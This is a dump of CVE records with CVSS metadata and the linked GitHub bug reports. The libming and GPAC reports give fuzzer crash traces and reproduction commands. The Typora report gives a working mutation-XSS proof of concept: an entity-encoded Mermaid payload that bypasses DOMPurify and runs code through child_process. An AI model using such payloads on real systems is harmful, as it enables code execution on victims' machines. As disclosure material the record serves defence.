in main (argc=0x2, argv=0x7fffffffe458) at ../fuzzsrc/ttfuzz.c:29 #8 0x00007ffff6e24b97 in __libc_start_main (main=0x4e18f0 <main>, argc=0x2, argv=0x7fffffffe458, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe448) at ../csu/libc-start.c:310 #9 0x000000000041ad4a in _start () ```
assertion failure in stbtt__cff_get_index in stb_truetype.h
https://api.github.com/repos/nothings/stb/issues/865/comments
2
2020-01-06T11:20:15Z
2021-07-04T10:08:04Z
https://github.com/nothings/stb/issues/865
545,676,449
865
997
CVE-2020-6628
2020-01-09T02:15:13.433
Ming (aka libming) 0.4.8 has a heap-based buffer over-read in the function decompile_SWITCH() in decompile.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/191" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/191" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/libming/libming/issues/191
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
export ASAN_OPTIONS=allocator_may_return_null=1 ./swftopython $poc [segmentaion_fault_decompile_569-use_after_free-idx:0x1365-0x2.zip](https://github.com/libming/libming/files/4028582/segmentaion_fault_decompile_569-use_after_free-idx.0x1365-0x2.zip) asan output ``` root@ubuntu:/home/tim/libming/util# export ASAN_OPTIONS=allocator_may_return_null=1 root@ubuntu:/home/tim/libming/util# ../../asan/libming/util/swftopython overflows/segmentaion_fault_decompile_569-use_after_free-idx\:0x1365-0x2 header indicates a filesize of 1484 but filesize is 228 #!/usr/bin/python from ming import * Ming_useSWFVersion(10); m = SWFMovie(); Ming_setScale(1.0); m.setRate(24.000000); m.setDimension(-9480, 8000); # SWF_PLACEOBJECT3 Failed to find branch target!!! Looking for: -2 ==95555==WARNING: AddressSanitizer failed to allocate 0xffffffffffffd438 bytes Stream out of sync after parse of blocktype 12 (SWF_DOACTION). 223 but expecting 200. # SWF_DOACTION ================================================================= ==95555==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61e000000b28 at pc 0x55bee29d8d4c bp 0x7fff67e356e0 sp 0x7fff67e356d0 READ of size 8 at 0x61e000000b28 thread T0 #0 0x55bee29d8d4b in decompile_SWITCH /home/tim/asan/libming/util/decompile.c:2104 #1 0x55bee29dba67 in decompileIF /home/tim/asan/libming/util/decompile.c:2594 #2 0x55bee29df98f in decompileAction /home/tim/asan/libming/util/decompile.c:3335 #3 0x55bee29dfe1a in decompileActions /home/tim/asan/libming/util/decompile.c:3494 #4 0x55bee29df2da in decompileSETTARGET /home/tim/asan/libming/util/decompile.c:3169 #5 0x55bee29dfd4a in decompileAction /home/tim/asan/libming/util/decompile.c:3465 #6 0x55bee29dfe1a in decompileActions /home/tim/asan/libming/util/decompile.c:3494 #7 0x55bee29dff50 in decompile5Action /home/tim/asan/libming/util/decompile.c:3517 #8 0x55bee29cbfd8 in outputSWF_DOACTION /home/tim/asan/libming/util/outputscript.c:1551 #9 0x55bee29ce57e in outputBlock /home/tim/asan/libming/util/outputscript.c:2083 #10 0x55bee29cf674 in readMovie /home/tim/asan/libming/util/main.c:281 #11 0x55bee29cfe0e in main /home/tim/asan/libming/util/main.c:354 #12 0x7f3a8dc34b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #13 0x55bee29c2469 in _start (/home/tim/asan/libming/util/swftopython+0x14469) 0x61e000000b28 is located 8 bytes to the right of 2720-byte region [0x61e000000080,0x61e000000b20) allocated by thread T0 here: #0 0x7f3a8e06f63e in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10c63e) #1 0x55bee29db912 in decompileIF /home/tim/asan/libming/util/decompile.c:2587 #2 0x55bee29df98f in decompileAction /home/tim/asan/libming/util/decompile.c:3335 #3 0x55bee29dfe1a in decompileActions /home/tim/asan/libming/util/decompile.c:3494 #4 0x55bee29df2da in decompileSETTARGET /home/tim/asan/libming/util/decompile.c:3169 #5 0x55bee29dfd4a in decompileAction /home/tim/asan/libming/util/decompile.c:3465 #6 0x55bee29dfe1a in decompileActions /home/tim/asan/libming/util/decompile.c:3494 #7 0x55bee29dff50 in decompile5Action /home/tim/asan/libming/util/decompile.c:3517 #8 0x55bee29cbfd8 in outputSWF_DOACTION /home/tim/asan/libming/util/outputscript.c:1551 #9 0x55bee29ce57e in outputBlock /home/tim/asan/libming/util/outputscript.c:2083 #10 0x55bee29cf674 in readMovie /home/tim/asan/libming/util/main.c:281 #11 0x55bee29cfe0e in main /home/tim/asan/libming/util/main.c:354 #12 0x7f3a8dc34b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tim/asan/libming/util/decompile.c:2104 in decompile_SWITCH Shadow bytes around the buggy address: 0x0c3c7fff8110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3c7fff8120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3c7fff8130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3c7fff8140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3c7fff8150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c3c7fff8160: 00 00 00 00 fa[fa]fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff8170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==95555==ABORTING root@ubuntu:/home/tim/libming/util# ```
heap overflow in decompile_SWITCH
https://api.github.com/repos/libming/libming/issues/191/comments
0
2020-01-07T01:51:41Z
2020-01-07T01:51:41Z
https://github.com/libming/libming/issues/191
546,033,507
191
998
CVE-2020-6629
2020-01-09T02:15:13.527
Ming (aka libming) 0.4.8 has z NULL pointer dereference in the function decompileGETURL2() in decompile.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/190" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/libming/libming/issues/190
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
swftophp $poc [libming_decompile762poc-out_of_mem-idx:0xfcd-0x0.zip](https://github.com/libming/libming/files/4028435/libming_decompile762poc-out_of_mem-idx.0xfcd-0x0.zip) asan output ``` root@ubuntu:/home/tim/libming/util# ../../asan/libming/util/swftophp overflows/libming_decompile762poc-out_of_mem-idx\:0xfcd-0x0 header indicates a filesize of 36374837 but filesize is 58 <?php $m = new SWFMovie(8); ming_setscale(1.0); $m->setRate(3.925781); $m->setDimension(0, 0); /* Note: xMin and/or yMin are not 0! */ $m->setFrames(4079); /* SWF_DOACTION */ AddressSanitizer:DEADLYSIGNAL ================================================================= ==2294==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x559547345499 bp 0x7fff7c524450 sp 0x7fff7c524420 T0) ==2294==The signal is caused by a READ memory access. ==2294==Hint: address points to the zero page. #0 0x559547345498 in decompileGETURL2 /home/tim/asan/libming/util/decompile.c:924 #1 0x559547350708 in decompileAction /home/tim/asan/libming/util/decompile.c:3236 #2 0x559547350ed6 in decompileActions /home/tim/asan/libming/util/decompile.c:3494 #3 0x55954735100c in decompile5Action /home/tim/asan/libming/util/decompile.c:3517 #4 0x55954733d007 in outputSWF_DOACTION /home/tim/asan/libming/util/outputscript.c:1551 #5 0x55954733f63a in outputBlock /home/tim/asan/libming/util/outputscript.c:2083 #6 0x559547340730 in readMovie /home/tim/asan/libming/util/main.c:281 #7 0x559547340eca in main /home/tim/asan/libming/util/main.c:354 #8 0x7fba80753b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #9 0x559547333469 in _start (/home/tim/asan/libming/util/swftophp+0x14469) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/tim/asan/libming/util/decompile.c:924 in decompileGETURL2 ==2294==ABORTING root@ubuntu:/home/tim/libming/util# vim ```
null pointer reference in decompileGETURL2
https://api.github.com/repos/libming/libming/issues/190/comments
0
2020-01-07T00:53:16Z
2020-01-07T00:53:16Z
https://github.com/libming/libming/issues/190
546,016,991
190
999
CVE-2020-6630
2020-01-09T02:15:13.590
An issue was discovered in GPAC version 0.8.0. There is a NULL pointer dereference in the function gf_isom_get_media_data_size() in isomedia/isom_read.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1377" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1377" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1377
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ yes] I looked for a similar issue and couldn't find any. - [ yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ MP42TS -src $POC -dst-file /dev/null [count_video.zip](https://github.com/gpac/gpac/files/4014701/count_video.zip) asan output ``` root@ubuntu:/home/tim/gpac# ../gpac-asan/MP42TS -src crashes/count_video.mp4-signalb-0x0 -dst-file /dev/null AddressSanitizer:DEADLYSIGNAL ================================================================= ==112791==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x55e4a53e12e4 bp 0x602000000370 sp 0x7fffdb37dbe0 T0) ==112791==The signal is caused by a READ memory access. ==112791==Hint: address points to the zero page. #0 0x55e4a53e12e3 in gf_isom_get_media_data_size isomedia/isom_read.c:3312 #1 0x55e4a5391fdd in fill_isom_es_ifce /home/tim/gpac-asan/applications/mp42ts/main.c:620 #2 0x55e4a5391fdd in open_source /home/tim/gpac-asan/applications/mp42ts/main.c:1518 #3 0x55e4a53836c0 in parse_args /home/tim/gpac-asan/applications/mp42ts/main.c:2260 #4 0x55e4a53836c0 in main /home/tim/gpac-asan/applications/mp42ts/main.c:2465 #5 0x7f9a8b98ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #6 0x55e4a53899c9 in _start (/home/tim/gpac-asan/MP42TS+0x1249c9) ```
null pointer reference in gf_isom_get_media_data_size
https://api.github.com/repos/gpac/gpac/issues/1377/comments
1
2020-01-02T00:45:04Z
2020-01-08T15:42:17Z
https://github.com/gpac/gpac/issues/1377
544,416,874
1,377
1,000
CVE-2020-6631
2020-01-09T02:15:13.653
An issue was discovered in GPAC version 0.8.0. There is a NULL pointer dereference in the function gf_m2ts_stream_process_pmt() in media_tools/m2ts_mux.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1378" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1378" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1378
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ yes] I looked for a similar issue and couldn't find any. - [ yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ MP42TS -src $POC -dst-file /dev/null [count_video1.zip](https://github.com/gpac/gpac/files/4014702/count_video1.zip) asan output ``` root@ubuntu:/home/tim/gpac# ../gpac-asan/MP42TS -src crashes/count_video.mp4-signalb-0x198 -dst-file /dev/null Setting up program ID 1 - send rates: PSI 200 ms PCR 100 ms - PCR offset 0 AddressSanitizer:DEADLYSIGNAL ================================================================= ==115151==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x558236d3d311 bp 0x6080000008a0 sp 0x7ffd7d124a70 T0) ==115151==The signal is caused by a READ memory access. ==115151==Hint: address points to the zero page. #0 0x558236d3d310 in gf_m2ts_stream_process_pmt media_tools/m2ts_mux.c:718 #1 0x558236d4dfd1 in gf_m2ts_mux_table_update_bitrate media_tools/m2ts_mux.c:256 #2 0x558236d4dfd1 in gf_m2ts_mux_update_config media_tools/m2ts_mux.c:2543 #3 0x558236bcfffd in main /home/tim/gpac-asan/applications/mp42ts/main.c:2684 #4 0x7ff116424b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #5 0x558236bd59c9 in _start (/home/tim/gpac-asan/MP42TS+0x1249c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV media_tools/m2ts_mux.c:718 in gf_m2ts_stream_process_pmt ==115151==ABORTING ```
null pointer reference in gf_m2ts_stream_process_pmt
https://api.github.com/repos/gpac/gpac/issues/1378/comments
2
2020-01-02T00:49:55Z
2020-01-17T15:09:51Z
https://github.com/gpac/gpac/issues/1378
544,417,280
1,378
1,001
CVE-2019-20374
2020-01-09T23:15:10.367
A mutation cross-site scripting (XSS) issue in Typora through 0.9.9.31.2 on macOS and through 0.9.81 on Linux leads to Remote Code Execution through Mermaid code blocks. To exploit this vulnerability, one must open a file in Typora. The XSS vulnerability is then triggered due to improper HTML sanitization. Given that the application is based on the Electron framework, the XSS leads to remote code execution in an unsandboxed environment.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.3, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.6, "impactScore": 6, "source": "cve@mitre.org", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/cure53/DOMPurify/commit/4e8af7b2c4a159b683d317e02c5cbddb86dc4a0e" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/typora/typora-issues/issues/3124" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/cure53/DOMPurify/commit/4e8af7b2c4a159b683d317e02c5cbddb86dc4a0e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/typora/typora-issues/issues/3124" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typora:typora:*:*:*:*:*:*:*:*", "matchCriteriaId": "E150220E-EC72-4C16-A3A7-B22F8092F693", "versionEndExcluding": null, "versionEndIncluding": "0.9.81", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typora:typora:*:*:*:*:*:*:*:*", "matchCriteriaId": "CFE9D2EA-01B2-461D-B227-1566D882C4C1", "versionEndExcluding": null, "versionEndIncluding": "0.9.9.31.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "79" ]
79
https://github.com/typora/typora-issues/issues/3124
[ "Third Party Advisory" ]
github.com
[ "typora", "typora-issues" ]
# Summary A mXSS in Typora leads to remote code execution. The vector is Mermaid code blocks (HTML labels) however other spots where Typora attempts to clean up HTML using DOMPurify could be prone to the same. # Steps to reproduce / PoC 1. Create an .md with the following contents: ~~~ ```mermaid graph TD z --> q{<svg></p><style><g title=&#x3c&#x73&#x76&#x67&#x3e&#x0a&#x22&#x3c&#x2f&#x73&#x74&#x79&#x6c&#x65&#x3e&#x3c&#x69&#x6d&#x67&#x20&#x73&#x72&#x63&#x20&#x6f&#x6e&#x65&#x72&#x72&#x6f&#x72&#x3d&#x65&#x76&#x61&#x6c&#x28&#x61&#x74&#x6f&#x62&#x28&#x27&#x64&#x48&#x4a&#x35&#x65&#x33&#x5a&#x68&#x63&#x69&#x42&#x79&#x50&#x58&#x4a&#x6c&#x63&#x57&#x35&#x76&#x5a&#x47&#x55&#x6f&#x4a&#x32&#x4e&#x6f&#x61&#x57&#x78&#x6b&#x58&#x33&#x42&#x79&#x62&#x32&#x4e&#x6c&#x63&#x33&#x4d&#x6e&#x4b&#x54&#x74&#x79&#x4c&#x6d&#x56&#x34&#x5a&#x57&#x4e&#x47&#x61&#x57&#x78&#x6c&#x4b&#x43&#x63&#x76&#x64&#x58&#x4e&#x79&#x4c&#x32&#x4a&#x70&#x62&#x69&#x39&#x6e&#x62&#x6d&#x39&#x74&#x5a&#x53&#x31&#x6a&#x59&#x57&#x78&#x6a&#x64&#x57&#x78&#x68&#x64&#x47&#x39&#x79&#x4a&#x79&#x6c&#x38&#x66&#x48&#x49&#x75&#x5a&#x58&#x68&#x6c&#x59&#x30&#x5a&#x70&#x62&#x47&#x55&#x6f&#x4a&#x32&#x4e&#x68&#x62&#x47&#x4d&#x75&#x5a&#x58&#x68&#x6c&#x4a&#x79&#x6c&#x39&#x59&#x32&#x46&#x30&#x59&#x32&#x68&#x37&#x64&#x32&#x6c&#x75&#x5a&#x47&#x39&#x33&#x4c&#x6d&#x4a&#x79&#x61&#x57&#x52&#x6e&#x5a&#x53&#x35&#x6a&#x59&#x57&#x78&#x73&#x53&#x47&#x46&#x75&#x5a&#x47&#x78&#x6c&#x63&#x69&#x67&#x6e&#x64&#x32&#x6c&#x75&#x5a&#x47&#x39&#x33&#x4c&#x6d&#x39&#x77&#x5a&#x57&#x34&#x6e&#x4c&#x43&#x41&#x6e&#x5a&#x6d&#x6c&#x73&#x5a&#x54&#x6f&#x76&#x4c&#x79&#x39&#x54&#x65&#x58&#x4e&#x30&#x5a&#x57&#x30&#x76&#x51&#x58&#x42&#x77&#x62&#x47&#x6c&#x6a&#x59&#x58&#x52&#x70&#x62&#x32&#x35&#x7a&#x4c&#x30&#x4e&#x68&#x62&#x47&#x4e&#x31&#x62&#x47&#x46&#x30&#x62&#x33&#x49&#x75&#x59&#x58&#x42&#x77&#x4c&#x30&#x4e&#x76&#x62&#x6e&#x52&#x6c&#x62&#x6e&#x52&#x7a&#x4c&#x30&#x31&#x68&#x59&#x30&#x39&#x54&#x4c&#x30&#x4e&#x68&#x62&#x47&#x4e&#x31&#x62&#x47&#x46&#x30&#x62&#x33&#x49&#x6e&#x4b&#x58&#x30&#x37&#x27&#x29&#x29&#x3e&#x22>} ``` ~~~ 2. Open the file in Typora 3. Witness a calculator pop up: ![poc1](https://user-images.githubusercontent.com/6436336/71534382-8c87f980-2952-11ea-941d-40f0bdb6d42d.gif) The payload is simply HTML-entity-encoded ```HTML <svg></p><style><g title=</style><img src onerror=eval(atob('dHJ5e3ZhciByPXJlcW5vZGUoJ2NoaWxkX3Byb2Nlc3MnKTtyLmV4ZWNGaWxlKCcvdXNyL2Jpbi9nbm9tZS1jYWxjdWxhdG9yJyl8fHIuZXhlY0ZpbGUoJ2NhbGMuZXhlJyl9Y2F0Y2h7d2luZG93LmJyaWRnZS5jYWxsSGFuZGxlcignd2luZG93Lm9wZW4nLCAnZmlsZTovLy9TeXN0ZW0vQXBwbGljYXRpb25zL0NhbGN1bGF0b3IuYXBwL0NvbnRlbnRzL01hY09TL0NhbGN1bGF0b3InKX07'))>} ``` where the JS is simply: ```JavaScript try{var r=reqnode('child_process');r.execFile('/usr/bin/gnome-calculator')||r.execFile('calc.exe')}catch{window.bridge.callHandler('window.open', 'file:///System/Applications/Calculator.app/Contents/MacOS/Calculator')}; ``` # Fix It's perhaps best to upgrade [DOMPurify](https://github.com/cure53/DOMPurify) to the [latest version](https://github.com/cure53/DOMPurify/releases/latest) which seems to address new mutation XSS vectors. It looks like the version that's shipped with Typora is somewhat old (1.0.4). Consider employing [Content-Security 